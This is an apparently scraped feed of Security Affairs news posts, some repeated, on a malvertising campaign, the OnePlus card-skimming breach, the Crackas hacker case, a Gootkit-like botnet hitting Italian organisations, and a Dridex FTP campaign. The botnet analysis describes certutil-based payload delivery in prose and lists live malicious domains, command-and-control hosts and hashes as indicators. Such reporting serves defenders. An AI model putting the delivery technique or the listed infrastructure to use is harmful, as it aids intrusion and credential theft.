While researchers were analyzing the malvertising campaign, they realized that most of the compromised websites used in the first weeks of the attacks have been cleaned up in the last days.  just in one week, the number of compromised websites dropped from around 35k to 18k.

According to Alexa Traffic Rank, hitcpm.com is ranked number 132 in the world and 0.2367% of global Internet users visit it. Below are reported some traffic statistics related to hitcpm.com provided by hypestat.com

Daily Unique Visitors 1,183,500
Monthly Unique Visitors 35,505,000
Pages per visit 1.41
Daily Pageviews 1,668,735

The analysis of the traffic shows an exponential increase in the traffic during October 2017.

Experts discovered that crooks used a malicious software to hijack traffic, it acts as brows a browser hijacker. The malware is distributed via various methods, such as:

  • Attachment of junk mail
  • Downloading freeware program via unreliable site
  • Open torrent files and click on malicious links
  • By playing online games
  • By visiting compromised websites

The main purpose of the malware is to hijack web browsers changing browser settings such as DNS, settings, homepage etc. in order to redirect as more traffic as possible to the dispatcher site.

Further technical details about this campaign, including IoCs, are available in the report titled:

Tens of thousands of compromised web sites involved in new massive malvertising campaign

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180121_CSE_Massive_Malvertising_Report.pdf

Pierluigi Paganini

(Security Affairs – malvertising campaign, malware)

The post CSE CybSec ZLAB Malware Analysis Report – Exclusive, tens of thousands of compromised sites involved in a new massive malvertising campaign appeared first on Security Affairs.



Security Affairs

Security Affairs: OnePlus admitted hackers stole credit card information belonging to up to 40,000 customers

OnePlus confirmed that a security breach affected its online payment system, hackers stole credit card information belonging to up to 40,000 customers.

OnePlus confirmed that a security breach affected its online payment system, a few days ago many customers of the Chinese smartphone manufacturer claimed to have been the victim of fraudulent credit card transactions after making purchases on the company web store.

OnePlus has finally confirmed that its online payment system was breached, following several complaints of fraudulent credit card transactions from its customers who made purchases on the company’s official website.
OnePlus Payment-Page-1024x579

Dozens of cases were reported through the support forum and on Reddit, the circumstance that credit cards had been compromised after customers bought a smartphone or some accessories from the OnePlus official website suggests it was compromised by attackers.

On January 19, the company released a statement to admit the theft of credit card information belonging to up to 40,000 customers. The hacker stole the credit card information between mid-November 2017 and January 11, 2018 by injecting a malicious script into the payment page code.

The script was used by attackers to sniff out credit card information while it was being entered by the users purchasing on the web store.

“We are deeply sorry to announce that we have indeed been attacked, and up to 40k users at oneplus.net may be affected by the incident. We have sent out an email to all possibly affected users.” reads the statement.
“One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered. The malicious script operated intermittently, capturing and sending data directly from the user’s browser. It has since been eliminated.”

OnePlus is still investigating the breach to determine how the hackers have injected the malicious script into its servers.

The script was used to sniff out full credit card information, including card numbers, expiry dates, and security codes, directly from a customer’s browser window.

OnePlus said that it has quarantined the infected server and enhanced the security of its systems.

Clients that used their saved credit card, PayPal account or the “Credit Card via PayPal” method are not affected by the security breach.

As a precaution, the company is temporarily disabling credit card payments at oneplus.net, clients can still pay using PayPal.  The company said it is currently exploring alternative secure payment options with our service providers.

OnePlus is notifying all possibly affected OnePlus customers via an email.

We are eternally grateful to have such a vigilant and informed the community, and it pains us to let you down. We are in contact with potentially affected customers. We are working with our providers and local authorities to address the incident better,” continues the statement.

Pierluigi Paganini(Security Affairs – CIA Director, email hacking)

The post OnePlus admitted hackers stole credit card information belonging to up to 40,000 customers appeared first on Security Affairs.



Security Affairs

OnePlus admitted hackers stole credit card information belonging to up to 40,000 customers

OnePlus confirmed that a security breach affected its online payment system, hackers stole credit card information belonging to up to 40,000 customers.

OnePlus confirmed that a security breach affected its online payment system, a few days ago many customers of the Chinese smartphone manufacturer claimed to have been the victim of fraudulent credit card transactions after making purchases on the company web store.

OnePlus has finally confirmed that its online payment system was breached, following several complaints of fraudulent credit card transactions from its customers who made purchases on the company’s official website.
OnePlus Payment-Page-1024x579

Dozens of cases were reported through the support forum and on Reddit, the circumstance that credit cards had been compromised after customers bought a smartphone or some accessories from the OnePlus official website suggests it was compromised by attackers.

On January 19, the company released a statement to admit the theft of credit card information belonging to up to 40,000 customers. The hacker stole the credit card information between mid-November 2017 and January 11, 2018 by injecting a malicious script into the payment page code.

The script was used by attackers to sniff out credit card information while it was being entered by the users purchasing on the web store.

“We are deeply sorry to announce that we have indeed been attacked, and up to 40k users at oneplus.net may be affected by the incident. We have sent out an email to all possibly affected users.” reads the statement.
“One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered. The malicious script operated intermittently, capturing and sending data directly from the user’s browser. It has since been eliminated.”

OnePlus is still investigating the breach to determine how the hackers have injected the malicious script into its servers.

The script was used to sniff out full credit card information, including card numbers, expiry dates, and security codes, directly from a customer’s browser window.

OnePlus said that it has quarantined the infected server and enhanced the security of its systems.

Clients that used their saved credit card, PayPal account or the “Credit Card via PayPal” method are not affected by the security breach.

As a precaution, the company is temporarily disabling credit card payments at oneplus.net, clients can still pay using PayPal.  The company said it is currently exploring alternative secure payment options with our service providers.

OnePlus is notifying all possibly affected OnePlus customers via an email.

We are eternally grateful to have such a vigilant and informed the community, and it pains us to let you down. We are in contact with potentially affected customers. We are working with our providers and local authorities to address the incident better,” continues the statement.

Pierluigi Paganini(Security Affairs – CIA Director, email hacking)

The post OnePlus admitted hackers stole credit card information belonging to up to 40,000 customers appeared first on Security Affairs.

Security Affairs: Crackas leader (15) gained access to data of intel operations in Afghanistan and Iran by posing as the CIA chief

British teenager Kane Gamble (15), leader of the ‘Crackas With Attitude’ hacking group gained access to intel operations in Afghanistan and Iran by posing as the CIA chief.

Do you remember “Crackas With Attitude”?

You remember for sure the Crackas With Attitude, a hacking crew that claimed clamorous actions in support of the Palestine cause.

The notorious group is responsible for clamorous attacks against US intelligence officials, the list of targeted victims is long and includes James Clapper, the Director of National Intelligence under President Obama’s administration and the deputy director of the FBI Jeh Johnson, CIA director John Brennan.

Cracka is also responsible for the disclosure of personal information of 31,000 government agents, including data of FBI agents, Department of Homeland Security (DHS) officers and DoJ employees.

crackas Kane Gamble

Cracka used the account “@DotGovz” on Twitter to publish online the sensitive data.

The Cracka with Attitude team always expressed its support to Palestine, they hacked US Government entities due to its support to the Israeli politics.

The group was lead by a British teenager, Kane Gamble, that was 15-years-old at the time of the hack of CIA director.

According to prosecutors, Kane Gamble accessed secret data related to intelligence operations in Afghanistan and Iran by pretending to be head of CIA.

“He accessed some extremely sensitive accounts referring to, among other things, military operations and intelligence operations in Afghanistan and Iran.” said John Lloyd-Jones QC prosecutor.

crackas Kane Gamble

Gamble was arrested in February 2016, in October 2017, Kane Gamble pleaded guilty to ten charges related to the attempted intrusions occurred between late 2015 and early 2016.

Two other members of Crackas With Attitude team, Andrew Otto Boggs and Justin Gray Liverman, were arrested by FBI in September 2016 and had already been sentenced to five years in federal prison.

Gamble pleaded guilty to eight charges of performing a function with intent to gain unauthorized access, and two charges of unauthorized acts with intent to compromise the operation of a computer.

“It all started by me getting more and more annoyed at how corrupt and cold-blooded the US Government is so I decided to do something about it.” Gamble told a journalist.

“The court heard Gamble “felt particularly strongly” about US-backed Israeli violence against Palestinians, the shooting of black people by US police, racist violence by the KKK and the bombing of civilians in Iraq and Syria.” reported The Sun.

Gamble’s advocate sustained that Gamble he is on the autism spectrum at the time of his offending had the mental development of a teenager.

“Medical experts for the defence argue that he is on the autism spectrum and at the time of his offending had the mental development of a 12 or 13-year-old.” reported The Telegraph.

“He has no friends to speak off and is closest to his mother Ann, a cleaner who reportedly won a £1.6million lottery jackpot in 1997  but  “lost all the money on doomed property deals”.  

William Harbage QC said that after his arrest he told doctors “it was kind of easy” and that he had little consequences of his actions “in his bedroom on the internet thousands of miles away”. “

The teenager is waiting for the final sentence.

Pierluigi Paganini

(Security Affairs – CIA Director, email hacking)

The post Crackas leader (15) gained access to data of intel operations in Afghanistan and Iran by posing as the CIA chief appeared first on Security Affairs.



Security Affairs

Crackas leader (15) gained access to data of intel operations in Afghanistan and Iran by posing as the CIA chief

British teenager Kane Gamble (15), leader of the ‘Crackas With Attitude’ hacking group gained access to intel operations in Afghanistan and Iran by posing as the CIA chief.

Do you remember “Crackas With Attitude”?

You remember for sure the Crackas With Attitude, a hacking crew that claimed clamorous actions in support of the Palestine cause.

The notorious group is responsible for clamorous attacks against US intelligence officials, the list of targeted victims is long and includes James Clapper, the Director of National Intelligence under President Obama’s administration and the deputy director of the FBI Jeh Johnson, CIA director John Brennan.

Cracka is also responsible for the disclosure of personal information of 31,000 government agents, including data of FBI agents, Department of Homeland Security (DHS) officers and DoJ employees.

crackas Kane Gamble

Cracka used the account “@DotGovz” on Twitter to publish online the sensitive data.

The Cracka with Attitude team always expressed its support to Palestine, they hacked US Government entities due to its support to the Israeli politics.

The group was lead by a British teenager, Kane Gamble, that was 15-years-old at the time of the hack of CIA director.

According to prosecutors, Kane Gamble accessed secret data related to intelligence operations in Afghanistan and Iran by pretending to be head of CIA.

“He accessed some extremely sensitive accounts referring to, among other things, military operations and intelligence operations in Afghanistan and Iran.” said John Lloyd-Jones QC prosecutor.

crackas Kane Gamble

Gamble was arrested in February 2016, in October 2017, Kane Gamble pleaded guilty to ten charges related to the attempted intrusions occurred between late 2015 and early 2016.

Two other members of Crackas With Attitude team, Andrew Otto Boggs and Justin Gray Liverman, were arrested by FBI in September 2016 and had already been sentenced to five years in federal prison.

Gamble pleaded guilty to eight charges of performing a function with intent to gain unauthorized access, and two charges of unauthorized acts with intent to compromise the operation of a computer.

“It all started by me getting more and more annoyed at how corrupt and cold-blooded the US Government is so I decided to do something about it.” Gamble told a journalist.

“The court heard Gamble “felt particularly strongly” about US-backed Israeli violence against Palestinians, the shooting of black people by US police, racist violence by the KKK and the bombing of civilians in Iraq and Syria.” reported The Sun.

Gamble’s advocate sustained that Gamble he is on the autism spectrum at the time of his offending had the mental development of a teenager.

“Medical experts for the defence argue that he is on the autism spectrum and at the time of his offending had the mental development of a 12 or 13-year-old.” reported The Telegraph.

“He has no friends to speak off and is closest to his mother Ann, a cleaner who reportedly won a £1.6million lottery jackpot in 1997  but  “lost all the money on doomed property deals”.  

William Harbage QC said that after his arrest he told doctors “it was kind of easy” and that he had little consequences of his actions “in his bedroom on the internet thousands of miles away”. “

The teenager is waiting for the final sentence.

Pierluigi Paganini

(Security Affairs – CIA Director, email hacking)

The post Crackas leader (15) gained access to data of intel operations in Afghanistan and Iran by posing as the CIA chief appeared first on Security Affairs.

Security Affairs: Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet

Threat actors with a deep knowledge of the Fiscal Italian ecosystem are using a huge botnet to target Italian companies and Ministry of the Interior.

On February 18 a colleague of mine (Luca) called me telling a malicious email was targeting Italian companies. This is the beginning of our new analysis adventure that Luca and I run together.

The email pretended to be sent by “Ministero dell’ Economia e delle Finanze” the Italian Department of Treasury  and it had smart subjects such as:

    • Codici Tributo Acconti
    • F24 Acconti-Codice Tributo 4034

The attacker knows very well the Italian Fiscal Year since those modules are very popular from company administration employees at that time. The attacker would probably exploit this attack path reaching out as many companies as possible. The email address was not coming from the “Ministero dell’ economia e delle Finanze” at all, it was coming from the following addresses:

    • info@amber-kate.com
    • info@fallriverproductions.com

The email looks like :

 Huge Botnet Attacking Italian Companies
Malicious eMail

A simple link pointing to a high reputation domain was popping out the default browser and downloading the following Javascript file. The high level of obfuscation and the way the content was provided was so suspicious to be worth to follow the analysis.

 
Infection: Stage 1 Obfuscated

After a deobfuscation phase the javascript looked much more easy te be read from a human side.

 
Infection: Stage 1 Clear Text

A romantic “drop and execute” section was happening. A GET connection to 239outdoors.com/themes5.php was dropping a file named 1t.exe and later on the same script was able to execute the dropped file.  The file 1t.exe was running on the victim machine contacting the Command and Control waiting for further commands.

The new sample looks like GootKit, a weaponized version of Banker Malware.  The malware installs itself and contacts Command and Control asking “what to do” and sending the “stolen credentials” directly to the Command and Control server. Details on IPs, Persistencies and so on, is provided in the IoC section, but today’s we won’t describe GootKit, we got access to the Dropping site!

We want to figure out if we might help victims to deactivate the malicious botnet by providing as much as possible details without focusing on the reverse the Malware per se since appears to be known.

By getting further analyzing the dropping website we immediately understood that the same URL was dropping another threat. The parallel threat the dropping website was spreading to the world was called “Nuovo Documento 2008” and it was a .bat file as follows.

 
New Threat Stage 1

That executable .bat file on a first stage opens up a browser pointing to a legitimate image but later on, it uses a notorious technique called “certutil for delivery of file” to drop and execute another file. This technique is well described here  by carnal0wnage. Basically, the attacker uses the certutil.exe program do download a Base64 encoded payload, to decode it and to run it. This technique is very silent since the User-Agent of certutils.exe is not suspicious because it needs to connect outside the company networks to check certificates, so not much IPS rules on it. The dropped file name unslss.exe appears to be very close to the previously analyzed one (1t.exe) it contacts the same C&C and it behaves in a similar way.   But again we won’t focus on reverse such a malware but rather we wont be able to reach the highest number of IoC to protect as much as possible the victims. By analyzing the Dropping website we founded that a significative number of connections had additional referrers, so we decided to focus our attention on how many DNS were pointing to such a domain. We did it and the result was quite impressive (please see the Dropping URLs IoC Section).

Following the research on the dropping website, we found an interesting log of all the connection coming from possible victims. We collected that log, and we built the following possible infection list (possible Victims). We won’t publish the Victims IP addresses but if you can prove you are legitimated by your company to ask that logs we can give you (for free, of course)  the IP addresses we’ve found related to your company. A detailed list of possible infected networks follows.

Possible Victims:

  • ACI informatica s.p.a.
  • AGOS-AS
  • AGSM Verona Spa
  • ASGARR Consortium GARR
  • Acantho S.p.a
  • Alfanews S.r.l.
  • Ambrogio s.r.l.
  • Asco TLC S.p.A.
  • Autostrade-as
  • BT Italia
  • BT Italia S.p.A.
  • Banca Monte Dei Paschi Di Siena S.P.A.
  • Brennercom S.p.A.
  • COLT Technology Services Group Limited
  • Camera dei deputati
  • Cesena Net srl
  • Clouditalia Telecomunicazioni S.p.A.
  • Comune Di Brescia
  • Comune di Bologna
  • Consortium GARR
  • Consorzio per il Sistema Informativo
  • Costacrociere-as
  • Duebite-as
  • E4A s.r.l.
  • Energente S.r.l.
  • FASTNET SpA
  • FASTWEB SPA
  • FINECO Banca del Gruppo Unicredit
  • Fastweb
  • Forcepoint Cloud Ltd
  • GenyCommunications
  • Global Com Basilicata s.r.l.
  • H3G Italy
  • Hynet S.R.L.
  • IBSNAZ
  • ICT Valle Umbra s.r.l.
  • InAsset S.r.l.
  • InfoCamere SCpA
  • Infracom Italia S.p.A.
  • Inrete s.r.l
  • Insiel- Informatica per il sistema degli enti loca
  • Integrys.it di Stefania Peragna impresa individual
  • Intred S.p.A.
  • KPNQWest Italia S.p.a.
  • LEPIDA
  • Lepida S.p.A.
  • Liguria Digitale S.C.p.A.
  • Linea Com S R L
  • Linkem spa
  • Lombardia Informatica S.p.A.
  • Mandarin S.p.A.
  • Mc-link SpA
  • Metrolink S.R.L.
  • Ministero dell’Interno
  • Mnet srl
  • NGI SpA
  • Nemo S.r.l.
  • Nordcom S.p.a.
  • Officine Informatiche Srl
  • Progetto Evo S.r.l.
  • Provincia di Reggio nell’Emilia
  • Qcom spa
  • Raiffeisen OnLine GmbH
  • Regione Basilicata
  • Regione Toscana
  • Regione Veneto
  • STI ADSL
  • Sardegnait-as
  • Societa’ Gestione Servizi Bp S.p.A.
  • TELEX S.r.l.
  • TWT S.p.A.
  • Telecom Italia
  • Terra S.p.a.
  • Time-net S.r.l.
  • Tiscali SpA
  • Trenitalia SpA
  • Trentino Network S.r.l.
  • Universita’ degli Studi di Milano
  • Venis S.p.A.
  • Videotime SPA
  • Vodafone Group Services GmbH
  • Vodafone Italia DSL
  • Vodafone Omnitel B.V.
  • Vodafone Omnitel N.v.
  • WIIT S.p.A.
  • Welcome Italia S.p.A
  • Wind Telecomunicazioni
  • Wind Telecomunicazioni SpA

Following the found IoC provided by the long “analysis journey”. I managed this analysis over the night, so I am sure there would be some imprecisions, but I preferred to speed up the entire analysis process to give the opportunity to block such infamous threat as soon as possible.

Hope it helps the community.

IoC:

  • eMail:
  • info@amber-kate.com
  • info@fallriverproductions.com
  • Dropping URLS:
  • 185.61.152.71
  • 239outdoors.com
  • bentlabel.com
  • cdvdautomator.com
  • cloudblueprintprogram.com
  • cnchalftone.com
  • comedyyall.com
  • conticellolaw.com
  • couplesdoingbusiness.com
  • dvoper.com
  • equinnex.com
  • ericandchrissy.com
  • evelynleekley.com
  • expungementstennessee.com
  • flaveme.com
  • grkisland.com
  • healingfoodconsulting.com
  • hertzsynergy.com
  • hollywoodisruption.com
  • home-sphere.com
  • integrativenutritiontherapy.com
  • jdkanyuk.com
  • kineloveclips.com
  • kylesinger.com
  • legionchristmas.com
  • menshoesonlinestore.com
  • microtiasurgery.com
  • movielotbar.com
  • muiienweg.com
  • niarhoslondon.com
  • opsantorinitours.com
  • progunjobs.com
  • rocketpak.com
  • scottishwindowsolutions.com
  • silkygames.com
  • snapshotsandwhatnots.com
  • snotterkind.com
  • solespin.com
  • strangerthanchristmas.com
  • synchronr.com
  • taramadden.com
  • terento.website
  • theargumint.com
  • thegildedwren.com
  • thejourneytogodsheart.com
  • thesaltybody.com
  • topsantorinitours.com
  • tuftandneedles.com
  • videospanishlessons.com
  • vovachka.com
  • wall-runners.com
  • war-arena.com
  • www.scottishwindowsolutions.com
  • z1logistics.com
  • zayantetinyhomes.com
  • zefeed.com
  • Command and Controls
  • 185.44.105.97
  • ns15.dreamsinthesun.com
  • bdi2.nomadicdecorator.com
  • elis.k9redemptionrescue.com
  • api.hailstorm360.com
  • cerera.survivalbid.com
  • mark.k9redemptionrescue.org
  • nsc.dayswithsunrays.com
  • at.moonbeammagic.com
  • ssl.vci-cfo.com
  • sip3.propertiesandprojects.com
  • host1.jodiray.com
  • note.lawrencechoy.com
  • note.lawrencechoy.com:80
  • 185.44.105.97:80/200
  • note.lawrencechoy.com:80
  • Hashes
  • 63d6927881d4978da4e162c17d82e9c009d0a93e
  • 7ea33f51b6c4aa54beee7fd878886339c22d2232
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b
  • 839ff9f4c3980ac67d4cbef296520ee364a0911f
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b

The original post published by Marco Ramilli on his blog at the following URL:

Huge Botnet Attacking Italian Companies

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – botnet, hacking)

The post Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet appeared first on Security Affairs.



Security Affairs

Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet

Threat actors with a deep knowledge of the Fiscal Italian ecosystem are using a huge botnet to target Italian companies and Ministry of the Interior.

On Januaty 18 a colleague of mine (Luca) called me telling a malicious email was targeting Italian companies. This is the beginning of our new analysis adventure that Luca and I run together.

The email pretended to be sent by “Ministero dell’ Economia e delle Finanze” the Italian Department of Treasury  and it had smart subjects such as:

    • Codici Tributo Acconti
    • F24 Acconti-Codice Tributo 4034

The attacker knows very well the Italian Fiscal Year since those modules are very popular from company administration employees at that time. The attacker would probably exploit this attack path reaching out as many companies as possible. The email address was not coming from the “Ministero dell’ economia e delle Finanze” at all, it was coming from the following addresses:

    • info@amber-kate.com
    • info@fallriverproductions.com

The email looks like :

 Huge Botnet Attacking Italian Companies
Malicious eMail

A simple link pointing to a high reputation domain was popping out the default browser and downloading the following Javascript file. The high level of obfuscation and the way the content was provided was so suspicious to be worth to follow the analysis.

 
Infection: Stage 1 Obfuscated

After a deobfuscation phase the javascript looked much more easy te be read from a human side.

 
Infection: Stage 1 Clear Text

A romantic “drop and execute” section was happening. A GET connection to 239outdoors.com/themes5.php was dropping a file named 1t.exe and later on the same script was able to execute the dropped file.  The file 1t.exe was running on the victim machine contacting the Command and Control waiting for further commands.

The new sample looks like GootKit, a weaponized version of Banker Malware.  The malware installs itself and contacts Command and Control asking “what to do” and sending the “stolen credentials” directly to the Command and Control server. Details on IPs, Persistencies and so on, is provided in the IoC section, but today’s we won’t describe GootKit, we got access to the Dropping site!

We want to figure out if we might help victims to deactivate the malicious botnet by providing as much as possible details without focusing on the reverse the Malware per se since appears to be known.

By getting further analyzing the dropping website we immediately understood that the same URL was dropping another threat. The parallel threat the dropping website was spreading to the world was called “Nuovo Documento 2008” and it was a .bat file as follows.

 
New Threat Stage 1

That executable .bat file on a first stage opens up a browser pointing to a legitimate image but later on, it uses a notorious technique called “certutil for delivery of file” to drop and execute another file. This technique is well described here  by carnal0wnage. Basically, the attacker uses the certutil.exe program do download a Base64 encoded payload, to decode it and to run it. This technique is very silent since the User-Agent of certutils.exe is not suspicious because it needs to connect outside the company networks to check certificates, so not much IPS rules on it. The dropped file name unslss.exe appears to be very close to the previously analyzed one (1t.exe) it contacts the same C&C and it behaves in a similar way.   But again we won’t focus on reverse such a malware but rather we wont be able to reach the highest number of IoC to protect as much as possible the victims. By analyzing the Dropping website we founded that a significative number of connections had additional referrers, so we decided to focus our attention on how many DNS were pointing to such a domain. We did it and the result was quite impressive (please see the Dropping URLs IoC Section).

Following the research on the dropping website, we found an interesting log of all the connection coming from possible victims. We collected that log, and we built the following possible infection list (possible Victims). We won’t publish the Victims IP addresses but if you can prove you are legitimated by your company to ask that logs we can give you (for free, of course)  the IP addresses we’ve found related to your company. A detailed list of possible infected networks follows.

Possible Victims:

  • ACI informatica s.p.a.
  • AGOS-AS
  • AGSM Verona Spa
  • ASGARR Consortium GARR
  • Acantho S.p.a
  • Alfanews S.r.l.
  • Ambrogio s.r.l.
  • Asco TLC S.p.A.
  • Autostrade-as
  • BT Italia
  • BT Italia S.p.A.
  • Banca Monte Dei Paschi Di Siena S.P.A.
  • Brennercom S.p.A.
  • COLT Technology Services Group Limited
  • Camera dei deputati
  • Cesena Net srl
  • Clouditalia Telecomunicazioni S.p.A.
  • Comune Di Brescia
  • Comune di Bologna
  • Consortium GARR
  • Consorzio per il Sistema Informativo
  • Costacrociere-as
  • Duebite-as
  • E4A s.r.l.
  • Energente S.r.l.
  • FASTNET SpA
  • FASTWEB SPA
  • FINECO Banca del Gruppo Unicredit
  • Fastweb
  • Forcepoint Cloud Ltd
  • GenyCommunications
  • Global Com Basilicata s.r.l.
  • H3G Italy
  • Hynet S.R.L.
  • IBSNAZ
  • ICT Valle Umbra s.r.l.
  • InAsset S.r.l.
  • InfoCamere SCpA
  • Infracom Italia S.p.A.
  • Inrete s.r.l
  • Insiel- Informatica per il sistema degli enti loca
  • Integrys.it di Stefania Peragna impresa individual
  • Intred S.p.A.
  • KPNQWest Italia S.p.a.
  • LEPIDA
  • Lepida S.p.A.
  • Liguria Digitale S.C.p.A.
  • Linea Com S R L
  • Linkem spa
  • Lombardia Informatica S.p.A.
  • Mandarin S.p.A.
  • Mc-link SpA
  • Metrolink S.R.L.
  • Ministero dell’Interno
  • Mnet srl
  • NGI SpA
  • Nemo S.r.l.
  • Nordcom S.p.a.
  • Officine Informatiche Srl
  • Progetto Evo S.r.l.
  • Provincia di Reggio nell’Emilia
  • Qcom spa
  • Raiffeisen OnLine GmbH
  • Regione Basilicata
  • Regione Toscana
  • Regione Veneto
  • STI ADSL
  • Sardegnait-as
  • Societa’ Gestione Servizi Bp S.p.A.
  • TELEX S.r.l.
  • TWT S.p.A.
  • Telecom Italia
  • Terra S.p.a.
  • Time-net S.r.l.
  • Tiscali SpA
  • Trenitalia SpA
  • Trentino Network S.r.l.
  • Universita’ degli Studi di Milano
  • Venis S.p.A.
  • Videotime SPA
  • Vodafone Group Services GmbH
  • Vodafone Italia DSL
  • Vodafone Omnitel B.V.
  • Vodafone Omnitel N.v.
  • WIIT S.p.A.
  • Welcome Italia S.p.A
  • Wind Telecomunicazioni
  • Wind Telecomunicazioni SpA

Following the found IoC provided by the long “analysis journey”. I managed this analysis over the night, so I am sure there would be some imprecisions, but I preferred to speed up the entire analysis process to give the opportunity to block such infamous threat as soon as possible.

Hope it helps the community.

IoC:

  • eMail:
  • info@amber-kate.com
  • info@fallriverproductions.com
  • Dropping URLS:
  • 185.61.152.71
  • 239outdoors.com
  • bentlabel.com
  • cdvdautomator.com
  • cloudblueprintprogram.com
  • cnchalftone.com
  • comedyyall.com
  • conticellolaw.com
  • couplesdoingbusiness.com
  • dvoper.com
  • equinnex.com
  • ericandchrissy.com
  • evelynleekley.com
  • expungementstennessee.com
  • flaveme.com
  • grkisland.com
  • healingfoodconsulting.com
  • hertzsynergy.com
  • hollywoodisruption.com
  • home-sphere.com
  • integrativenutritiontherapy.com
  • jdkanyuk.com
  • kineloveclips.com
  • kylesinger.com
  • legionchristmas.com
  • menshoesonlinestore.com
  • microtiasurgery.com
  • movielotbar.com
  • muiienweg.com
  • niarhoslondon.com
  • opsantorinitours.com
  • progunjobs.com
  • rocketpak.com
  • scottishwindowsolutions.com
  • silkygames.com
  • snapshotsandwhatnots.com
  • snotterkind.com
  • solespin.com
  • strangerthanchristmas.com
  • synchronr.com
  • taramadden.com
  • terento.website
  • theargumint.com
  • thegildedwren.com
  • thejourneytogodsheart.com
  • thesaltybody.com
  • topsantorinitours.com
  • tuftandneedles.com
  • videospanishlessons.com
  • vovachka.com
  • wall-runners.com
  • war-arena.com
  • www.scottishwindowsolutions.com
  • z1logistics.com
  • zayantetinyhomes.com
  • zefeed.com
  • Command and Controls
  • 185.44.105.97
  • ns15.dreamsinthesun.com
  • bdi2.nomadicdecorator.com
  • elis.k9redemptionrescue.com
  • api.hailstorm360.com
  • cerera.survivalbid.com
  • mark.k9redemptionrescue.org
  • nsc.dayswithsunrays.com
  • at.moonbeammagic.com
  • ssl.vci-cfo.com
  • sip3.propertiesandprojects.com
  • host1.jodiray.com
  • note.lawrencechoy.com
  • note.lawrencechoy.com:80
  • 185.44.105.97:80/200
  • note.lawrencechoy.com:80
  • Hashes
  • 63d6927881d4978da4e162c17d82e9c009d0a93e
  • 7ea33f51b6c4aa54beee7fd878886339c22d2232
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b
  • 839ff9f4c3980ac67d4cbef296520ee364a0911f
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b

The original post published by Marco Ramilli on his blog at the following URL:

Huge Botnet Attacking Italian Companies

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – botnet, hacking)

The post Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet appeared first on Security Affairs.

Experts uncovered a new campaign abusing FTP servers to deliver Dridex Banking Trojan

Security researchers at Forcepoint have spotted a new spam campaign that is abusing compromised FTP servers as a repository for malicious documents and infecting users with the Dridex banking Trojan.

The Dridex banking Trojan is a long-running malware that has been continuously improved across the years.

The malicious email campaign was first noticed by Forcepoint on January 17, 2018, the messages were primarily sent to .com top level domains (TDLs) most of them in France, the UK, and Australia.

“The sender domains used are observed to be compromised accounts. The sender names rotated around the following names, perhaps to make the emails look more convincing to unsuspecting recipients: admin@, billing@, help@, info@, mail@, no-reply@, sale@, support@, ticket@.” reads the analysis published by Forcepoint.

Attackers used at least two types of weaponized documents, one of them is a Word document abusing DDE protocol for malware execution, and an XLS file with macro code that download the Dridex banking Trojan from a compromised server.

Dridex banking Trojan

According to the experts, the attackers obtained in some way the login credentials to compromise the servers used in this campaign.

“The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way.” states Forcepoint.

“The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable,”

The experts believe the campaign is leveraging the infamous Necurs botnet to send out spam messages, researchers noticed that downloaders used by attackers are similar to those used by the botnet before.

Forcepoint highlighted that the spam volume associated with this campaign was very low compared to other Necurs campaigns, attackers sent only 9,500 emails, it is very low respect millions of emails sent through the botnet in other campaigns.

Another peculiarity of this campaign is the use of FTP servers for download the malware.

“Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords,” Forcepoint concluded.

Forcepoint report included IoCs for this campaign.

Pierluigi Paganini

(Security Affairs – botnet, Dridex banking Trojan)

The post Experts uncovered a new campaign abusing FTP servers to deliver Dridex Banking Trojan appeared first on Security Affairs.

Health South East RHF data breach exposed health records for half of Norway’s Population

On January 8, the Health South East RHF, that is the healthcare organization that manages hospitals in Norway’s southeast region disclosed a major security breach.

On January 8, the Health South East RHF, that is the healthcare organization that manages hospitals in Norway’s southeast region (countries of Østfold, Akershus, Oslo, Hedmark, Oppland, Buskerud, Vestfold, Telemark, Aust-Agder and Vest-Agder), disclosed a security breach that may have exposed sensitive data belonging to more than half of the population.

